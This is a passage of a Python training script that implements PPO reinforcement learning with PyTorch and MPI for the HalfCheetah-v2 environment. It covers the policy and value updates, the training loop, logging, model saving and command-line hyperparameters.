        """Copy hyperparameters from the parsed CLI args onto the instance."""
        self.epochs = args.epochs
        self.steps_per_epoch = args.steps_per_epoch
        # Per-process share of the global batch size.
        self.local_steps_per_epoch = int(self.steps_per_epoch / num_procs())
        self.max_ep_len = args.max_ep_len
        self.save_freq = args.save_freq
        self.actor_lr = args.actor_lr
        self.critic_lr = args.critic_lr
        self.train_pi_iters = args.train_pi_iters
        self.train_v_iters = args.train_v_iters
        self.gamma = args.gamma
        self.lam = args.lam
        self.clip_ratio = args.clip_ratio
        self.target_kl = args.target_kl
        # Save the parameters setting to config file
        self.logger = EpochLogger(**logger_kwargs)
        self.logger.save_config(locals())

    def _init_nets(self):
        """Build actor-critic networks, optimizers and the value loss."""
        # initial actor and critic
        self.actor_critic = ActorCritic(self.state_dim, self.action_space)
        # initial optim
        self.actor_optim = optim.Adam(self.actor_critic.policy.parameters(), lr=self.actor_lr)
        self.critic_optim = optim.Adam(self.actor_critic.value_function.parameters(), lr=self.critic_lr)
        # initial loss
        self.loss = nn.MSELoss()
        # Broadcast initial weights so all MPI ranks start identical.
        core.sync_all_params(self.actor_critic.parameters())

    def update(self):
        """One PPO update: several clipped policy-gradient steps (with KL
        early stopping), then value-function regression, then diagnostics."""
        states, actions, advantages, returns, logp_olds = [core.to_tensor(x) for x in self.replay_buffer.get()]
        # Training policy
        _, logp, _, _, _ = self.actor_critic.policy(states, actions)
        # a sample estimate for entropy
        entropy = (-logp).mean()
        # Importance ratio pi_new/pi_old and the clipped surrogate objective.
        ratio = (logp - logp_olds).exp()
        min_adv = torch.where(advantages > 0, (1 + self.clip_ratio) * advantages, (1 - self.clip_ratio) * advantages)
        pi_l_old = -(torch.min(ratio * advantages, min_adv)).mean()
        for i in range(self.train_pi_iters):
            # Output from policy function graph
            _, logp, _, _, _ = self.actor_critic.policy(states, actions)
            # PPO policy objective
            ratio = (logp - logp_olds).exp()
            min_adv = torch.where(advantages > 0, (1 + self.clip_ratio) * advantages, (1 - self.clip_ratio) * advantages)
            pi_loss = -(torch.min(ratio * advantages, min_adv)).mean()
            # Policy update
            self.actor_optim.zero_grad()
            pi_loss.backward()
            # Average gradients across MPI ranks before stepping.
            core.average_gradients(self.actor_optim.param_groups)
            self.actor_optim.step()
            # _, logp, _, _, _ = self.actor_critic.policy(states, actions)
            # Sample KL estimate, averaged over ranks; stop early if the
            # policy moved too far from the data-collecting policy.
            kl = (logp_olds - logp).mean()
            kl = mpi_avg(kl.item())
            if kl > 1.5 * self.target_kl:
                self.logger.log('Early stopping at step %d due to reaching max kl.' % i)
                break
        self.logger.store(StopIter=i)
        # Training value function
        v = self.actor_critic.value_function(states)
        v_l_old = self.loss(v, returns)
        for _ in range(self.train_v_iters):
            # Output from value function graph
            v = self.actor_critic.value_function(states)
            # PPO value function objective
            v_loss = self.loss(v, returns)
            # Value function gradient step
            self.critic_optim.zero_grad()
            v_loss.backward()
            core.average_gradients(self.critic_optim.param_groups)
            self.critic_optim.step()
        # Log changes from update
        _, logp, _, _, _, v = self.actor_critic(states, actions)
        ratio = (logp - logp_olds).exp()
        min_adv = torch.where(advantages > 0, (1 + self.clip_ratio) * advantages,
                              (1 - self.clip_ratio) * advantages)
        pi_l_new = -(torch.min(ratio * advantages, min_adv)).mean()
        v_l_new = self.loss(v, returns)
        kl = (logp_olds - logp).mean()  # a sample estimate for KL-divergence
        # Fraction of samples whose ratio was clipped (diagnostic).
        clipped = (ratio > (1 + self.clip_ratio)) | (ratio < (1 - self.clip_ratio))
        cf = (clipped.float()).mean()
        self.logger.store(
            LossPi=pi_l_old,
            LossV=v_l_old,
            KL=kl,
            Entropy=entropy,
            ClipFrac=cf,
            DeltaLossPi=(pi_l_new - pi_l_old),
            DeltaLossV=(v_l_new - v_l_old))

    def run(self):
        """Main training loop: collect `local_steps_per_epoch` transitions
        per epoch, bootstrap truncated trajectories, update, save, log."""
        # Create dir for model saving
        if not osp.exists(fpath): os.mkdir(fpath)
        start_time = time.time()
        state, reward, done, ep_return, ep_len = self.env.reset(), 0, False, 0, 0
        # Main loop: collect experience in env and update/log each epoch
        for epoch in range(self.epochs):
            self.actor_critic.eval()
            for t in range(self.local_steps_per_epoch):
                action, _, logp, _, _, v = self.actor_critic(core.to_tensor(state.reshape(1, -1)))
                # save and log
                self.replay_buffer.store(state, action.detach().numpy(), reward, v.item(), logp.detach().numpy())
                self.logger.store(VVals=v)
                state, reward, done, _ = self.env.step(action.detach().numpy()[0])
                ep_return += reward
                ep_len += 1
                terminal = done or (ep_len == self.max_ep_len)
                if terminal or (t == self.local_steps_per_epoch - 1):
                    if not terminal:
                        print('Warning: trajectory cut off by epoch at %d steps.' % ep_len)
                    # if trajectory didn't reach terminal state, bootstrap value target
                    last_val = reward if done else \
                        self.actor_critic.value_function(core.to_tensor(state.reshape(1, -1))).item()
                    self.replay_buffer.finish_path(last_val)
                    if terminal:
                        # only save EpRet / EpLen if trajectory finished
                        self.logger.store(EpRet=ep_return, EpLen=ep_len)
                    state, reward, done, ep_return, ep_len = self.env.reset(), 0, False, 0, 0
            # Perform PPO update!
            self.actor_critic.train()
            self.update()
            # Save model
            if (epoch % self.save_freq == 0) or (epoch == self.epochs - 1):
                self.logger.save_state({'env': self.env}, None)
                self.save_model(epoch)
            # Log info about epoch
            self.logger.log_tabular('Epoch', epoch)
            self.logger.log_tabular('EpRet', with_min_and_max=True)
            self.logger.log_tabular('EpLen', average_only=True)
            self.logger.log_tabular('VVals', with_min_and_max=True)
            self.logger.log_tabular('TotalEnvInteracts', (epoch + 1) * self.steps_per_epoch)
            self.logger.log_tabular('LossPi', average_only=True)
            self.logger.log_tabular('LossV', average_only=True)
            self.logger.log_tabular('DeltaLossPi', average_only=True)
            self.logger.log_tabular('DeltaLossV', average_only=True)
            self.logger.log_tabular('Entropy', average_only=True)
            self.logger.log_tabular('KL', average_only=True)
            self.logger.log_tabular('ClipFrac', average_only=True)
            self.logger.log_tabular('StopIter', average_only=True)
            self.logger.log_tabular('Time', time.time() - start_time)
            self.logger.dump_tabular()

    def save_model(self, epoch):
        """Pickle the whole actor-critic module to `<fpath>/actor_critic<epoch>.pkl`."""
        torch.save(self.actor_critic, osp.join(fpath, 'actor_critic'+str(epoch)+'.pkl'))
# Entry point: parse hyperparameters, fork MPI workers, then train.
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    """ env """
    parser.add_argument('--env', type=str, default='HalfCheetah-v2')
    parser.add_argument('--epochs', type=int, default=50)
    parser.add_argument('--steps_per_epoch', type=int, default=4000)
    parser.add_argument('--max_ep_len', type=int, default=1000)
    parser.add_argument('--train_pi_iters', type=int,default=80)
    parser.add_argument('--train_v_iters', type=int, default=80)
    parser.add_argument('--save_freq', type=int, default=5)
    """ algorithm """
    parser.add_argument('--gamma', type=float, default=0.99)
    parser.add_argument('--lam', type=float, default=0.95)
    parser.add_argument('--clip_ratio', type=float, default=0.2)
    parser.add_argument('--target_kl', type=float, default=0.01)
    parser.add_argument('--actor_lr', type=float, default=1e-4)
    parser.add_argument('--critic_lr', type=float, default=1e-3)
    """ others """
    parser.add_argument('--seed', '-s', type=int, default=0)
    parser.add_argument('--exp_name', type=str, default='ppo')
    parser.add_argument('--cpu', type=int, default=2)
    args = parser.parse_args()

    # run parallel code with mpi
    mpi_fork(args.cpu)

    logger_kwargs = setup_logger_kwargs(args.exp_name, args.seed)
    # Save model path
    # `fpath` is read as a module-level global by PPO.run()/save_model().
    fpath = osp.join(logger_kwargs['output_dir'], 'models')

    ppo = PPO()
    ppo.run()
| 8,048 | -11 | 197 |